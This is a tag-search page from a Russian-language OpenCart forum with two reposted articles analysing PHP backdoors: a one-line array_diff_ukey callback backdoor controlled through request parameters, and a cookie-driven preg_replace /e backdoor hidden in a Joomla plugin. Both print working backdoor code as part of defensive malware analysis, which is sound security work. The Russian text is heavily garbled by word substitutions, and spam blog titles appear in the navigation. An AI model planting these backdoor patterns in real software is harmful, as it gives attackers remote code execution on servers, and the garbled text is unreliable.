Перейти к публикации
  • разработка интернет магазинов на opencart
  • доработка интернет магазинов на opencart

Поиск по сайту

Резульиты поиска по тегам 'backdoor'.

  • Поиск по тегам

    Введите теги через запятую.
  • Поиск по автору

Тип публикаций


Категории и разгделы

  • Основной
    • Новости и анонсы
    • Предложения и пожелания
    • Акции, подарки, конкурсы и награды
  • Opencart 4.x
    • Opencart 4.x: Общие вопросы
    • Opencart 4.x: Усиновка и обновление
    • Opencart 4.x: Локализация
    • Opencart 4.x: Настройка и оптимизация
    • Opencart 4.x: Песочница
    • Opencart 4.x: Поиск модулей
    • Opencart 4.x: Отчёты об ошибках
  • Opencart 3.x
    • Opencart 3.x: Общие вопросы
    • Opencart 3.x: Усиновка и обновление
    • Opencart 3.x: Локализация
    • Opencart 3.x: Настройка и оптимизация
    • Opencart 3.x: Песочница
    • Opencart 3.x: Поиск модулей
    • Opencart 3.x: Отчёты об ошибках
  • Opencart 2.x
    • Opencart 2.x: Общие вопросы
    • Opencart 2.x: Усиновка и обновление
    • Opencart 2.x: Локализация
    • Opencart 2.x: Настройка и оптимизация
    • Opencart 2.x: Песочница
    • Opencart 2.x: Поиск модулей
    • Opencart 2.x / ocStore 2.x: Отчёты об ошибках
  • Реклама и продвижение
    • SEO-вопросы (оптимизация и продвижение магазина)
    • Контекстная реклама
    • Торговые площадки
    • E-commerce tracking и бизнес аналитика
    • Разное
  • Подгдержка и ответы на вопросы
    • Общие вопросы
    • Усиновка, обновление, настройка
    • Шаблоны, дизайн и оформление магазина
    • Модули и дополнения
    • Помощь программисим и разрилитликам
    • Мобильная витрина
    • Вопросы безопасности
    • Перевод
    • Отчёты об ошибках
    • Интернет-магазины и электронная коммерция
    • Песочница
  • Услуги
    • Создание магазинов под ключ
    • Дизайн, верстка и шаблоны
    • Программирование, создание модулей, изменение функциональности
    • Настройка и мелкая рилии по уже суещёствуюещёму сайту
    • Обновление версии движка магазина
    • Наполнение магазина
    • Системное администрирование (настройка хостинга, серверов, ПО)
    • Другие услуги
  • Разное
    • Пользовательские обзоры дополнений
    • Примеры сайтов на OpenCart (ocStore)
    • Курилка
    • Предложения по улучшению

Категории

  • Шаблоны
    • Бесплатные шаблоны
    • Платные шаблоны
  • Фильтры
  • Цены, скидки, акции, подарки
  • Реклама и продвижение
  • Бонусы, купоны, программы лояльности
  • Блоги, новости, ситьи
  • Покупки, оформление заказа, корзина
  • Опции
  • Атрибуты
  • Серии, Комплекты
  • Поиск
  • SEO, кари сайи, оптимизация
  • Кэширование, сжатие, ускорение
  • Платоженые системы
  • Досивки
  • Редакторы
  • Меню, дизайн, внешний вид
  • Слайдшоу, баннеры, гнореи
  • Письма, поли, рассылки, sms
  • Обратная связь, звонки
  • Обмен данными
  • Учет в заказе
  • Сравнения, закладки
  • Социальные сети
  • Парсеры
  • Модули
  • Инструменты, утилиты
  • Лиэтонзии
  • Языковые пакеты
  • Прочее
  • Отчеты
  • Спотому чторки
    • ocStore
  • Услуги
    • Графика и дизайн
    • Маркетинг

Категории

  • Служебные документы
  • Оплаи
  • Докумениция Opencart

Категории

  • Общие вопросы
  • Покупка дополнений
  • Для разрилитликов
  • Аккаунт
  • Техническая подгдержка
  • Финансовый отгдел

Блоги

  • Konorws (Разрилитка и модификация Opencart)
  • Блог mr.Kent)
  • Прожектор
  • Layk
  • Продвижение интернет-магазина, seo оптимизация
  • Записная книжка
  • Блог RGB
  • Модули которые сгделают сайт лучше
  • Блог веб-студаи NeoSeo
  • Useful IT
  • Записи
  • Найгденные решения проблем с Opencart
  • ocdroid blog
  • Заметки на полях...
  • Pimur
  • Серж Ткач
  • О жизни, смерти, о бизнесе и Опенкарте
  • Просто мысли от laim731
  • Маркетинг и продвижение интернет-магазина
  • Мой копирайтинг
  • SEO потому чтоксинг специального назначения
  • Get-Web Dev
  • Seok
  • Блоги sitecreator-а
  • Best practice
  • Vlad-Egorov-Blog
  • Блог spectre
  • commanddotcom
  • Внимание мошенники
  • Наблюгдения обычного человека
  • Блог Rassol2
  • Блог Exploits
  • блог для натуралов
  • Настюша, тут есть темы
  • Пропиино рекламой
  • Tutorial
  • ОтВини
  • Tg chnls
  • Блог
  • Блог sv2109
  • КАК ОРГАНИЗОВАТЬ НОВОСТНЫЕ ПОДПИСКИ НА БАЗЕ API OPENCART 3/0/2
  • VDS/VPS, серверы под Linux: усиновка, настройка, оптимизация
  • IT блог
  • Блог
  • Opencart SEO
  • Путёвые заметки о рилите магазина NiceBike на платформе OpenCart
  • Blondi Blog
  • Полезные ситьи, новости.
  • Блог влагдельца магазина
  • Хостинг для OpenCart
  • разное
  • ПРОДАЖА АКАУНТОВ-binance ВЕРИФИЦИРОВАННЫe ЧИСТЫЕ УСПЕВАЙТЕ КУПИТЬ ПО НИЗКОЙ ЦЕНЕ
  • Диспансеризация
  • wozobat
  • quasarbyte
  • Мой блог
  • Igorych
  • aaaaa
  • 👌🔊Bellsouth CUSTOMER support number 1+(8O8)678=9O64-☎phone number
  • Liudmila marketer
  • Заметки реалиси

Искать резульиты в...

Искать резульиты, согдержащие...


Даи создания

  • Начать

    Конец


Последнее обновление

  • Начать

    Конец


Фильтр по когдачеству...

Зарегистрирован

  • Начать

    Конец


Группа


Сайт


Skype


Город:


Интересы

Найгдено 2 резульии

  1. Это перепечатка ситьи "В PHP Callback функциях скрывается бэкдор". Мы часто силкиваемся с новыми изощренными способами, применяемыми авторами вредоносного ПО для запуска сейчасы на серверах. Некоторые из них очень интересны, другие — забавны. Есть и икие, которые своей необычностью просто сивят нас в тупик. Этот пост именно о последних. Каждый, кто пишет код на PHP знает для чего предназначена функция eval(). Можно сказать, что она исполняет код, согдержащийся в строке. Однако, есть много других путей для исполнения кода, которые не всегда столь очевидны. Самый популярный — использование функции preg_replace(). В соответствии со своим описанием, функция preg_replace производит поиск в строке subject совпагдений с шаблоном pattern и заменяет их на replacement. К сожнонию, при использовании «\e» модификатора, эи функция икже исполняет код. Конечно, есть еещё много спосопотому чтов выполнить код без использования eval(), например, create_function() или assert(). Все эти несиндартные методы исполнения кода гделают проэтосс выявления угроз доситочно сложной проэтодурой. Все вышеописанные вещи авторы вредоносного ПО частенько начали использовать для своих Бэкдоров. Бэкдоры Все началось со следуюещёй строки кода, найгденной в начно нормального PHP файла: @array_diff_ukey(@array((string)$_REQUEST['password']=>1), @array((string)stripslashes($_REQUEST['re_password'])=>2),$_REQUEST['login']); Это засивило меня поразмышлять некоторое время, прежгде чем я понял как это может рилиить. В конэто концов я понял, что проблема в Callback функции. Уже видите почему? Автор зловреда сгделал колбек-функцию переменной «login», которая им же и контролируется. Вот ик он мог задать Логин выполняемой функцией, что позволяло ему выполнять команды на сервере. Злоумышленник мог выполнить любую команду, которую он хочет, на этом сервере за счет одной строчки кода. Что самое страшное, икая вещь не обнаруживалась ни одной антивирусной системой или другим софтом, которое мы используем. Да в чем же основная опасность? Большинство инструментов безопасности и всяческих ситей, рекомендую вебмастерам обращать внимание на функции, которые часто используются в злонамеренных этолях, икие как: eval, preg_replace, base64_decode и другие. Теперь вы знаете, что хакеры налинают активно использовать и самые безобидные функции в своих плохих для вас этолях. Запомните, что злоумышленники не ограниливаются одной функцией array_diff_ukey(), они могут использовать любую функцию, предполагающую коллбек. Оригинальный текст позаимствован отсюда: http://virusdie.ru/blog/2014/04/28/phpcallbackbackdoor/
  2. Непотому чтольшой пост об интересном бэкдоре, который мы нашли в плагине для Joomla. Этот бэкдор был ик умело сгделан, что сначала мы даже не понял, был ли это бэкдор или нет, хотя и знали, что згдесь что-то не ик. Вот как выглягдел код плагина: На первый взгляд ничего подозрительного не видно. Ничего не зашифровано, ничего не обфусцировано, нет ни каких странных комменириев. Просто нормальный код плагина для Джумлы. Если посмотреть потому чтолее внимательно, то вы увидите, что конструктор класса не является тем, чем кажется на первый взгляд. Первое, что можно заметить — это то, что die(); стоит в конэто кода. Эи функция завершает выполнение текуещёго скрипи. Однако, это плагин для Joomla, что означает, что die(); убьет все проэтоссы в Joomla. Как вы понимаете это не очень хорошо для плагина, особенно на сидии инициализации. Теперь вы можете заметить это: /123/e. Напоминает регулярное выражение с evalфлагом, которое мы постоянно видим в различных бэкдорах с "preg_replace". Видно, что если заменить $option на preg_replace, то получается типичный бэкдор с "preg_replace": preg_replace(«/123/e», $auth, 123); Поскольку 123 всегда равно 123, то код всегда бугдет принимать значение переменной $auth. Для того, чтобы наша гипотеза была верна, $option должно быть равно "preg_replace", а $auth должна согдержать PHP код. Давайте посмотрим, возможно ли это. Видно, что обе переменные заполняются из Cookie, ик что да — это вполне возможно. Как рилииет бэкдор. Описанный код предполагает, что бэкдор рилииет следующим обвместе: После того, как плагин был усиновлен на Joomla, он запускается каждый раз при загрузке люпотому чтой страницы и конструктор класса в плагине всегда запускается на выполнение. P3 – этот триггер вызывает выполнение бэкдора. Без него Джумла рилииет как обычно. P2 — этот кук должен быть "preg_replace", P3 — згдесь передается произвольный PHP код. Не все плагины вредоносны. В отлилие от WordPress плагинов, о которых мы недавно писали, ггде вредоносный код был подсажен «пираими»(которые пересобрали коммерческий плагин уже со своим бэкдором) этот случай не выглядит ик, будто влагделец сайи скачал на каком-то подозрительном ресурсе этот плагин для Joomla. Плагин InstantSuggestявляется бесплатным и едва ли широко известен (менее 400 загрузок ). Его реальный код не согдержит функцию _counstruct(). Более вероятный сэтонарий заключается в следуюещём. Бэкдор был добавлен хакерами после взлома сайи, чтобы сохранить доступ к нему, даже если исходный дыра в безопасности была бы закрыи. Более того, похоже, что хакеры не встраивали бэкдор в уже суещёствующий плагин, а просто усиновили свой плагин с бэкдором. Это проещё, чем изменять суещёствующие файлы, что может нарушить рилиту сайи и раскрыть попытку взлома. Кроме того, икой способ требует потому чтолее сложного инжектора. В качестве доказательства этот гипотезы мы искали в Интернете бэкдор коды и всегда обнаруживали его внутри кода instantsuggest. Ксити, этот код икже используется вне контекси Joomla с Joomla API запросами, подменяемыми простым вызовом @$_COOKIE. Даже в этих тех случаях он по-прежнему окружен кодомinstantsuggest. Похоже, злоумышленники слииют, что это гделает код менее подозрительным :) Оригинальный текст ситьи згдесь.
×
×
  • Создать...

Важная информация

На нашем сайте используются файлы cookie и происходит обрилитка некоторых персональных данных пользователей, чтобы улучшить пользовательский интерфейс. Чтобы узнать для чего и какие персональные данные мы обрабатываем перейдите по ссылке. Если Вы нажмете «Я даю согласие», это означает, что Вы понимаете и принимаете все условия, указанные в этом Уведомлении о Конфигденциальности.